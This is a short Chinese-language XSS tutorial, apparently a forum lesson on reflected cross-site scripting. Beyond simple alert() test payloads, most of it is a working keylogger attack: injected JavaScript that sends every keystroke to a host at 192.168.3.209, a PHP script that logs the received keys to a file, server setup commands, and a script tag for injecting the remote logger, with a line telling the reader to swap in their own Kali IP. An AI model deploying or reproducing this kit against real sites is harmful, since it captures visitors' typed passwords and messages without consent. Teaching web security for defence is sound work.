本文最后更新于2035天前,其中的信息可能已经有所发展或是发生改变。
<script>alert('bbskali.cn')</script>
<img src=http://p1.so.qhmsg.com/t014e1de0f43d7b2066.jpg onerror=alert('xss')>
document.onkeypress=function(evt){
evt=evt || window.event
key=String.fromCharCode(evt.charCode)
if(key){
var http=new XMLHttpRequest();
var param=encodeURI(key);
http.open("POST","http://192.168.3.209/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
<?php
$key=$_POST['key'];
$logfile='keylog.txt';
$fp=fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
service apache2 start
chmod 777 keylog.txt
<script src="http://192.168.3.209/Keylogger.js"></script>
将ip地址改为自己kali的ip
好了本节课简单的反射型XSS就讲到这里,下节课我们接着来看看储存型的xss攻击!
更多教程 扫描关注吧
点击阅读原文 快速访问论坛
论坛地址:bbskali.cn
本文来源于互联网:反射性XSS攻击
点击数:57